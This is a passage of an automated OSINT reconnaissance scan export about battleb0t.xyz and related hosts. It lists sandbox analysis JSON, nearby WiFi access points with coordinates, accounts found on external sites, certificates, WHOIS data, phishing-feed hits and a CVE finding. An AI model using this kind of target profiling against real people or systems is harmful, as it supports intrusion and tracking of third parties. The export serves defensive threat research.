u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'172.67.134.250', u'172.67.134.250', u'142.251.32.42', u'142.250.191.35', u'99.84.238.172', u'142.251.46.170', u'185.199.111.153', u'172.64.133.15', u'104.18.7.3', u'143.204.130.227', u'142.250.189.206', u'142.251.214.142', u'104.18.70.113', u'99.84.238.190', u'157.240.22.25', u'45.60.121.129', u'99.84.238.103', u'52.216.212.177', u'142.250.189.232', u'13.35.126.71', u'142.250.189.214', u'142.250.191.34', u'23.55.103.97', u'13.35.125.16', u'104.17.210.204', u'13.35.125.14', u'157.240.22.35', u'142.251.46.238', u'142.251.214.134', u'13.35.125.69', u'104.17.71.176', u'104.18.33.171', u'44.227.167.233', u'142.251.2.154', u'142.250.188.10', u'142.250.189.161', u'104.16.53.111', u'52.42.126.136', u'35.201.112.186', u'99.84.238.112', u'35.186.194.58', u'151.101.2.110', u'54.213.154.214', u'52.89.127.0', u'35.162.236.93', u'142.250.189.174', u'142.251.46.195', u'142.251.32.46', u'104.19.154.83', u'35.244.218.227'], u'sha256': u'2dd0c093bda9d915f5043f2e827c446b6911c760e46c3e11de607a05c686856b', u'sha512': u'72c6b21776ab594c097dba2585e7c5cabfe3f0a116e6a60e56e8e82be3938b5106a767d0610253d53ed8c500378e47de2de124b42a77a51f8ffcbd03097caa4b', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://riverside.fm/', u'submission_id': u'63dcded18cdba55a3f42cb1a', u'created_at': u'2023-02-03T10:15:45+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-03T10:15:45+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 50, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'c56dad5fd0c2962e78335f65f428f5b5', u'network_mode': u'default', u'processes': [], u'sha1': u'77f939fc618403372967a345ca4999fdf36e90a4', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 10 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'edge.fullstory.com', u'ekr.zdassets.com', u'js.hs-banner.com' | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Curiouscat (Category: social)
https://curiouscat.live/login | login |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom474ABC (Net ID: 00:0C:F6:47:4A:BC) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative innovation network - Collaborative innovation is a process in which multiple players contribute towards creating new products with customers and suppliers. | battleb0t.github.io |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:03:66:4F) | 52.3759, 4.8975 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SHE (Net ID: 00:02:6F:3B:09:D3) | 37.7642, -122.3993 |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5de9314c41108c-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.117 | 34.148.97.127 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.199): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | P2d8T7f2d$ (Net ID: 00:18:0A:DF:81:10) | 32.8608, -79.9746 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Donation Alerts (Category: business)
https://www.donationalerts.com/r/login | login |
| 2023-05-12 02:46:50 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | 34.74.170.74 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | ArmorGames (Category: gaming)
https://armorgames.com/user/ayhu | ayhu |
| 2023-05-12 02:54:41 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://vijayvtrvv.github.io/Netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b08_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b08_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_b08_ConnHashTable<2824>_HashTable_Mutex"\n "IsoScope_b08_IE_EarlyTabStart_0xa10_Mutex"\n "IsoScope_b08_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b08_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2824"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_1789619C-BEEA-11ED-BCF0-0800274498C4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "XNIF2NEQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XNIF2NEQ.txt]- [targetUID: 00000000-00002824]\n "ILAV0GWD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ILAV0GWD.txt]- [targetUID: 00000000-00002824]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "AYPRTCQD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AYPRTCQD.txt]- [targetUID: 00000000-00002764]\n "YD44M3BI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YD44M3BI.txt]- [targetUID: 00000000-00002764]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002824]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_0FE65957-BEEA-11ED-BCF0-0800274498C4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF0F7147F21451F5D5.TMP" has type "data"- Location: [%TEMP%\\~DF0F7147F21451F5D5.TMP]- [targetUID: 00000000-00002824]\n "RecoveryStore._0FE65955-BEEA-11ED-BCF0-0800274498C4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "5SKQI1K8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5SKQI1K8.txt]- [targetUID: 00000000-00002824]\n "~DFC76CE97BABDC83A2.TMP" has type "data"- Location: [%TEMP%\\~DFC76CE97BABDC83A2.TMP]- [targetUID: 00000000-00002824]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "D4LFXWPK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D4LFXWPK.txt]- [targetUID: 00000000-00002824]\n "0HR9FPNL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0HR9FPNL.txt]- [targetUID: 00000000-00002824]\n "~DF2006E49898172CAF.TMP" has type "data"- Location: [%TEMP%\\~DF2006E49898172CAF.TMP]- [targetUID: 00000000-00002824]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "MUID0C360FC979EA6DFB10321D1978A66CCEmsn.com/102542014812163109822931516121831019767*"\n Pattern match: "https://vijayvtrvv.github.io"\n Pattern match: "https://vijayvtrvv.github.io/Netflix-clone/"\n Pattern match: "isdomainmigratedtruewww.msn.com/10257999334403105598531500496831019767*"\n Pattern match: "MUIDB095C7AB1B9DC6C63374A6861B8586DD3ieonline.microsoft.com/921641914812163109822931156746831019767*"\n Pattern match: "SUIDMmicrosoft.com/921640589920003101987531156746831019767*MUID095C7AB1B9DC6C63374A6861B8586DD3microsoft.com/102541914812163109822931156746831019767*_EDGE_V1microsoft.com/921641914812163109822931172371831019767*SRCHDAF=NOFORMmicrosoft.com/10243323789440310"\n Pattern match: "SUIDMmicrosoft.com/921640589920003101987531156746831019767*MUID095C7AB1B9DC6C63374A6861B8586DD3microsoft.com/102541914812163109822931156746831019767*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA694"\n Pattern match: "SUIDMmicrosoft.com/921640589920003101987531156746831019767*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=2022013"\n Pattern match: "www.msn.com/"\n Heuristic match: "ijayvtrvv.github.io"\n Pattern match: "vijayvtrvv.github.io/Netflix-clone/"\n Pattern match: "vv.github.io/Netflix-clone/"\n Heuristic match: "api.ipify.org"\n Heuristic match: "checkip.amazonaws.com"\n Heuristic match: "checkip.dyndns.com"\n Heuristic match: "checkip.dyndns.org"\n Heuristic match: "checkip.org"\n Heuristic match: "checkmyip.com"\n Heuristic match: "cmyip.com"\n Heuristic match: "curlmyip.com"\n Heuristic match: "findmyip.org"\n Heuristic match: "formyip.com"\n Heuristic match: "geoip.co.uk"\n Heuristic match: "geoiptool.com"\n Heuristic match: "getmyip.co.uk"\n Heuristic match: "getmyip.org"\n Heuristic match: "icanhazip.com"\n Heuristic match: "ifconfig.me"\n Heuristic match: "ip-addr.es"\n Heuristic match: "ip-address.domaintools.com"\n Heuristic match: "ip-api.com"\n Heuristic match: "ip-score.com"\n Heuristic match: "ip.jsontest.com"\n Heuristic match: "ip.xss.ru"\n Heuristic match: "ip4.telize.com"\n Heuristic match: "ipchicken.com"\n Heuristic match: "ipecho.net"\n Heuristic match: "ipinfo.info"\n Heuristic match: "ipinfo.io"\n Heuristic match: "ipleak.net"\n Heuristic match: "ipligence.com"\n Heuristic match: "knowmyip.com"\n Heuristic match: "maxmind.com"\n Heuristic match: "meineipadresse.de"\n Heuristic match: "myexternalip.com"\n Heuristic match: "myip.dnsomatic.com"\n Heuristic match: "myip.ht"\n Heuristic match: "myip.nl"\n Heuristic match: "myip.opendns.com"\n Heuristic match: "myipaddress.com"\n Heuristic match: "queryip.net"\n Heuristic match: "showmyip.com"\n Heuristic match: "showmyipaddress.com"\n Heuristic match: "tracemyip.org"\n Heuristic match: "whatismyip.akamai.com"\n Heuristic match: "whatismyip.ca"\n Heuristic match: "whatismyip.com"\n Heuristic match: "whatismyip.everdot.org"\n Heuristic match: "whatismyipaddress.com"\n Heuristic match: "whatsmyip.net"\n Heuristic match: "whatsmyip.org"\n Heuristic match: "whatsmyipaddress.org"\n Heuristic match: "whatsmypublicip.com"\n Heuristic match: "wtfismyip.com"\n Heuristic match: "hispeed.ch"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkID=57190"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=32146res://wmploc.dll/ICW_ErrorPage.htm"\n Pattern match: "wmploc.dll/Service_Initial.htm"\n Pattern match: "wmploc.dll/Error_ServiceInfo.htm\'res://wmploc.dll/Offline_InfoCenter.htm&res://wmploc.dll/Offline_AlbumInfo.htm"\n Pattern match: "wmploc.dll/Service_NoFunc.htm%res://wmploc.dll/Service_No_Local.htm"\n Pattern match: "wmploc.dll/RT_IMAGE/ServiceLarge.png*res://wmploc.dll/RT_IMAGE/ServiceSmall.png*res://wmploc.dll/RT_IMAGE/ServiceSmall.png"\n Pattern match: "wmploc.dll/Blocked_AlbumInfo.htm&res://wmploc.dll/Blocked_AlbumInfo.htm,http://go.microsoft.com/fwlink/?LinkId=70183\'res:// | 185.199.109.153 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | oldfluid.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://oldfluid.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://oldfluid.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-cache-status,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:F7:C5:5E) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:35 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:26 2022 GMT
Not After : Feb 15 17:26:25 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:aa:4d:69:12:67:d1:ef:14:86:20:9d:cf:2c:a8:
0d:c9:a7:6c:06:2b:6c:f8:9e:1f:f7:5b:41:e3:d6:
87:ca:57:bb:98:07:35:18:67:8f:28:74:6a:04:77:
89:a0:80:85:fc:4d:2e:7a:12:ee:d9:55:9b:e8:51:
03:88:3d:06:0a:14:47:b6:c6:bf:e2:f2:6e:38:57:
77:d8:da:10:9f:18:48:30:90:76:66:83:1b:18:b6:
6d:f9:38:58:a1:cc:7b:d2:96:34:23:9b:ea:85:2c:
bb:61:4a:ef:9a:58:1e:2d:73:fc:eb:20:c5:37:d4:
7c:8e:77:66:2d:b6:0a:4e:0d:e0:f4:1d:87:9f:f3:
39:d7:d9:45:03:a6:8f:40:08:8a:3e:d5:15:b6:01:
8a:08:27:45:ff:cb:af:e5:d1:fd:28:cb:df:75:d3:
f7:db:3d:e9:43:0c:e5:b6:28:89:d2:ba:63:6c:e0:
ac:03:c0:49:9f:2c:e6:11:96:03:1a:33:a3:63:63:
dc:3b:1c:a8:9b:0f:00:ea:cb:bf:0c:39:fd:1c:40:
ab:3a:92:ca:b0:90:5c:21:ed:f1:8e:4f:9e:e7:92:
92:53:94:1d:fa:e2:36:84:fa:2a:17:63:6d:d0:c9:
16:92:48:c8:82:19:57:63:48:56:6e:6a:2e:34:87:
cc:7c:79:cf:43:dc:a4:a2:fb:e4:06:17:02:db:ef:
92:10:48:04:d1:04:89:aa:65:ee:9d:e2:a1:cd:ce:
9c:27:f6:46:3e:9e:91:90:6e:12:78:d2:cd:5e:a3:
75:48:b4:82:f5:c9:29:da:c5:bb:ac:87:af:95:fa:
f8:49:db:fe:e5:df:04:7e:92:10:6e:c8:d7:7b:93:
ef:de:5b:4f:7a:70:41:0c:59:d9:04:5e:26:57:3d:
65:af:57:00:3d:40:e4:ec:3b:92:38:0a:d1:a5:20:
31:40:89:48:9a:58:46:06:1e:56:4f:e5:25:e6:f5:
33:d9:bb:68:90:99:70:c6:a1:93:5a:22:c1:e3:ee:
da:ef:45:a4:37:18:4c:33:42:7e:6f:07:01:85:ed:
36:f3:3f:be:f6:6a:d9:3e:fe:ad:4c:8d:18:3e:0e:
49:d9:7a:95:04:47:e8:2c:a9:fe:24:7a:53:d0:af:
27:b2:85:89:f7:05:df:d8:9a:0d:56:23:cd:ee:11:
cb:31:f6:4e:3f:af:22:51:d3:a0:8f:a4:52:72:6f:
12:6d:6d:c2:7a:fe:c4:93:c1:f6:23:a9:9a:2b:35:
9d:df:e3:e9:99:57:fb:f5:e8:d9:e8:4d:a5:ec:7e:
dd:22:c5:d3:4f:c7:2d:bf:e4:09:ee:6f:cb:b6:13:
f8:ae:73
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CE:03:E9:CB:9A:4D:5E:BB:32:45:93:FC:78:CC:A3:7F:08:26:B1:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
ac:60:96:91:2c:ed:62:e3:68:ab:ed:e4:c1:61:0e:e3:90:31:
8e:31:a9:4b:46:c3:8d:c5:e0:8d:6a:1f:71:38:56:82:9c:31:
ee:2d:1e:c2:98:27:b8:9a:55:a7:78:ac:42:82:80:5a:1a:3f:
46:90:d5:fc:3f:8e:74:b4:e7:d4:76:72:66:4f:64:e7:54:46:
71:43:bb:42:84:c6:ab:aa:25:38:1c:ad:60:ca:08:fb:2f:af:
6b:e9:0e:62:15:97:73:27:ee:39:ae:11:a2:19:fc:87:93:31:
01:c6:c2:bd:5e:38:b1:3d:e5:5a:62:7e:60:8c:17:d0:3e:6e:
32:57:eb:54:28:cc:4a:0d:97:2a:6c:f6:c3:5d:8d:fc:27:99:
db:56:f3:bf:e2:b4:48:94:fb:dc:8e:3d:27:43:4b:4a:90:a7:
5c:68:44:45:9f:de:e6:ec:0b:1d:70:e4:c8:83:60:12:96:7f:
ec:53:10:4f:3d:05:06:c8:b9:0f:d6:87:14:c3:ad:47:7e:54:
4f:22:a7:90:86:28:be:cb:1b:db:56:26:75:23:0a:0e:be:e0:
7a:ad:c8:af:3f:81:81:ab:65:ab:91:6f:ac:eb:f0:ed:29:05:
3a:74:6a:ac:41:f3:d3:ea:c7:b8:d2:98:d6:a4:8f:dc:f6:59:
7a:f9:d5:0f
| battleb0t.xyz |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00-evan.github.io]
https://www.openphish.com/feed.txt | 00-evan.github.io |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:80 | 172.67.168.252 |
| 2023-05-12 03:06:53 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TheCs_Kids (Net ID: 00:02:6F:F8:F3:36) | 39.0469, -77.4903 |
| 2023-05-12 02:59:47 | Affiliate - Domain Whois | No | Whois | 3 | 0 | 4 | 0 | None | Domain Name: KEYUBU.NET
Registry Domain ID: 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registry Expiry Date: 2024-07-31T21:39:25Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
